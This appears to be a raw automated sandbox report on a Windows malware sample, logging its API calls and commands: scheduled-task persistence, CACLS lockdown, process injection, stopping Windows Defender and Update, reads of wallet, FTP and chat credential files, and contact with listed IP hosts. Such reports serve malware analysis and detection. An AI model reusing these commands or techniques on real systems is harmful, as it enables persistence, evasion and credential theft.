regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x000002ec
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

regkey_r: AddressBook
base_handle: 0x000002ec
key_handle: 0x00000274
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: Connection Manager
base_handle: 0x000002ec
key_handle: 0x00000274
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: DirectDrawEx
base_handle: 0x000002ec
key_handle: 0x00000274
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: EditPlus
base_handle: 0x000002ec
key_handle: 0x00000274
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: ENTERPRISE
base_handle: 0x000002ec
key_handle: 0x00000274
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

regkey_r: Fontcore
base_handle: 0x000002ec
key_handle: 0x00000274
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: Google Chrome
base_handle: 0x000002ec
key_handle: 0x00000274
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: Haansoft HWord 80 Korean
base_handle: 0x000002ec
key_handle: 0x00000274
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: IE40
base_handle: 0x000002ec
key_handle: 0x00000274
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: IE4Data
base_handle: 0x000002ec
key_handle: 0x00000274
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3544 CREDAT:145409
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\e8b5234212" /P "test22:N"&&CACLS "..\e8b5234212" /P "test22:R" /E&&Exit
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3544 CREDAT:145411
cmdline cmd /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline CACLS "Utsysc.exe" /P "test22:R" /E
cmdline cmd /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\e8b5234212" /P "test22:N"&&CACLS "..\e8b5234212" /P "test22:R" /E&&Exit
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3544 CREDAT:79875
cmdline C:\Windows\sysnative\cmd /c "C:\Users\test22\AppData\Local\Temp\EDD5.tmp\EDF6.tmp\EDF7.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7wT5Ey89.exe"
cmdline CACLS "Utsysc.exe" /P "test22:N"
cmdline C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe
cmdline "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe"
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline netsh wlan show profiles
cmdline "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"
cmdline "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\EDD5.tmp\EDF6.tmp\EDF7.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7wT5Ey89.exe"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
host 109.107.182.2
host 167.235.20.126
host 149.40.62.171
host 171.22.28.213
host 171.22.28.239
host 185.196.8.176
host 185.196.9.171
host 193.233.255.73
host 194.169.175.118
host 194.169.175.235
host 5.182.86.30
host 77.91.124.1
host 77.91.124.86
host 85.209.176.171
file C:\Users\test22\AppData\Roaming\1000085000\V¯ÃDU p×­ fÈŒv»~-:)ù.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 3708
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000118
1 0 0

NtAllocateVirtualMemory

process_identifier: 3856
region_size: 208896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000118
1 0 0

NtAllocateVirtualMemory

process_identifier: 3124
region_size: 245760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000118
1 0 0
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
Time & API Arguments Status Return Repeated

ControlService

service_handle: 0x001faff0
service_name: WinDefend
control_code: 1
0 0

ControlService

service_handle: 0x001fb4a0
service_name: wuauserv
control_code: 1
0 0
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP004.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP005.TMP\"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
Time & API Arguments Status Return Repeated

LdrGetDllHandle

module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0
file C:\Users\test22\AppData\Roaming\Electrum\wallets
file C:\Users\test22\AppData\Roaming\Litecoin\wallets
registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
file C:\Users\test22\AppData\Local\Temp\e8b5234212\.purple\accounts.xml
file C:\Windows\.purple\accounts.xml
file C:\util\Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final\.purple\accounts.xml
file C:\Users\test22\AppData\Local\Temp\ea7c8244c8\.purple\accounts.xml
file C:\Users\test22\AppData\Local\Temp\1000006001\.purple\accounts.xml
file C:\Users\test22\AppData\Local\Temp\1000009001\.purple\accounts.xml
file C:\Windows\System32\.purple\accounts.xml
file C:\Program Files\Windows Photo Viewer\.purple\accounts.xml
file C:\Program Files (x86)\Internet Explorer\.purple\accounts.xml
file C:\util\.purple\accounts.xml
file C:\Program Files (x86)\Microsoft Office\Office12\.purple\accounts.xml
file C:\Program Files (x86)\Google\Chrome\Application\.purple\accounts.xml
file C:\Windows\System32\wbem\.purple\accounts.xml
file C:\Windows\SysWOW64\.purple\accounts.xml
file C:\Python27\.purple\accounts.xml
file C:\.purple\accounts.xml
file C:\Program Files (x86)\Hnc\Hwp80\.purple\accounts.xml
file C:\Program Files (x86)\EditPlus\.purple\accounts.xml
file C:\Users\test22\AppData\Local\Temp\1000020001\.purple\accounts.xml
file C:\Users\test22\AppData\Local\Temp\1000024001\.purple\accounts.xml
file C:\SystemRoot\System32\.purple\accounts.xml
file C:\Program Files\_Sandboxie\.purple\accounts.xml
file C:\Program Files\Windows NT\Accessories\.purple\accounts.xml
file C:\Users\test22\Downloads\.purple\accounts.xml
file C:\Program Files\_Wireshark\.purple\accounts.xml
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL‰¡$eà" 0$þB `@  `…¬BO`œ€ tA  H.text# $ `.rsrcœ`&@@.reloc €,@B
base_address: 0x00400000
process_identifier: 3708
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer:  €P€8€€h€œ`  4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°lStringFileInfoH000004b0Comments"CompanyName6FileDescriptionoffDef0FileVersion1.0.0.06 InternalNameoffDef.exeHLegalCopyrightCopyright © 2023*LegalTrademarks> OriginalFilenameoffDef.exe.ProductNameoffDef4ProductVersion1.0.0.08Assembly Version1.0.0.0¬cê<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x00406000
process_identifier: 3708
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: @ 3
base_address: 0x00408000
process_identifier: 3708
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 3708
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $àž ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhX‚ÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°€dX´ÿmY°€’Y¥ÿmY°€oX¥ÿmYRich¤ÿmYPELʯBeà $*ºA@@0@L›(ààðô0à @@.textô)* `.rdataxa@b.@@.dataH#°@À.rsrcààž@@.relocô0ð2 @B
base_address: 0x00400000
process_identifier: 3856
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ “ ÿÿÿÿ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þˆZB@¶B@¶B@¶B@¶B@¶BH¶B]Bˆ^BÈTB€µB`°BC˜¶B(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇBœ¶B,ÇB,ÇB,ÇB,ÇB,ÇB,ÇB,ÇB..þÿÿÿ   þÿÿÿu˜LÓ­ôk§cßÜÆ텁„&XÔi¾üørÕ ²l¢-µsõ^}xFÝz§ÁƯµ{*C‚ ]š}‰u¸ØwÉÇiíÖ(“õ[!¼h¬=Ð)ÄI\íAÙU˜$þ6ŒfyôKÈ|`@óŽém0Ø8v¶¤.~%âïǨÎÝ$€}DÜHY؛ÃWæ\ˋsS?½ï›G mh‰O‘3J깧)ûäa/§tR¡AºÕÿê4ÿÿ° ŸKñ9ãÉD}E/B‹çGüÜgnÅÚ9ô3/çÀ4è± ßKÎ óÎ3¸õxÏ´sÜz¸™ã7iÓ•UضÔHuç¢:J4Ðar0Y‰Æ ˜A¾¼O1lKz²•E½±íšZJ2`Aà5²ÆÅz±€0}†K!tÌwþl¢­T`Dñ(4UÕæ !FŽ’æ@Ü„DÔ&ÿ®|iª¡…ý-Vôüƒ>ê;‡ÂxkßÀ#3ƒ‹šJ$UˆnT¸‹?µÝòg\ç4&Ú3|FuwŽ¤e«Žãè £èn¢±‡­>v5å.góFÃ|,’¡9UF~£ÇÖ¡›.]“PÓ0ÿoÚLåšÆC °âæŸêÁ'‚=`SËJ„¤øÒ´B|×°­'‹„ëQ(÷ˆ«¹“yl)2Ô;<÷Fýä@ÊZ%×ïŐÈÄ,Qñ´=Ï£¥£‘Pöa S;qŽî.Øy´}R¤à1ÔwxS±¢ RðÈ/½î5~èÛSôƁ§S½ÜÁÙ`ɐ5Utàô¶oý«†õˆ`6¡âŠò­í¦a:Ʀm!Åcà’}²{î€a­¯Mme®2@¾—@£xbÈ^–¥i>Ž…JÖå)¤±‚JõòÓÂ3²ÝÞo<—BNPòÁŒbˆV†lÎ_%Ïò røß>Ûãù—´sŸ·äîu±ü¿c\£RôKêüM¡–³¾n>•÷D—»5Öèõ|9!! ÊrjH«·ˆöã^4Ì»¢ûö©[{ ÁáœâàÜxÅbýD^W·Ñà§ÃêAu»vÂiâ7ÎÕèç~¨±+¹±¼ôà~|™ yì8Eõ–¾¹?䔵÷¼F+>`V|ŽB.?AVbad_exception@std@@|ŽB.?AVexception@std@@|ŽB.?AVtype_info@@
base_address: 0x0042b000
process_identifier: 3856
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: €0€ H`à}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0042e000
process_identifier: 3856
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 3856
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL`Ùüà 0À¬ß à@ À@…¸ÞSàN©   H.text¿ À `.rsrcN©àªÂ@@.reloc  l@B
base_address: 0x00400000
process_identifier: 3124
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: Ð ?
base_address: 0x0043a000
process_identifier: 3124
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 3124
process_handle: 0x00000118
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL‰¡$eà" 0$þB `@  `…¬BO`œ€ tA  H.text# $ `.rsrcœ`&@@.reloc €,@B
base_address: 0x00400000
process_identifier: 3708
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $àž ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhX‚ÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°€dX´ÿmY°€’Y¥ÿmY°€oX¥ÿmYRich¤ÿmYPELʯBeà $*ºA@@0@L›(ààðô0à @@.textô)* `.rdataxa@b.@@.dataH#°@À.rsrcààž@@.relocô0ð2 @B
base_address: 0x00400000
process_identifier: 3856
process_handle: 0x00000118
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL`Ùüà 0À¬ß à@ À@…¸ÞSàN©   H.text¿ À `.rsrcN©àªÂ@@.reloc  l@B
base_address: 0x00400000
process_identifier: 3124
process_handle: 0x00000118
1 1 0
Time & API Arguments Status Return Repeated

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000045c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
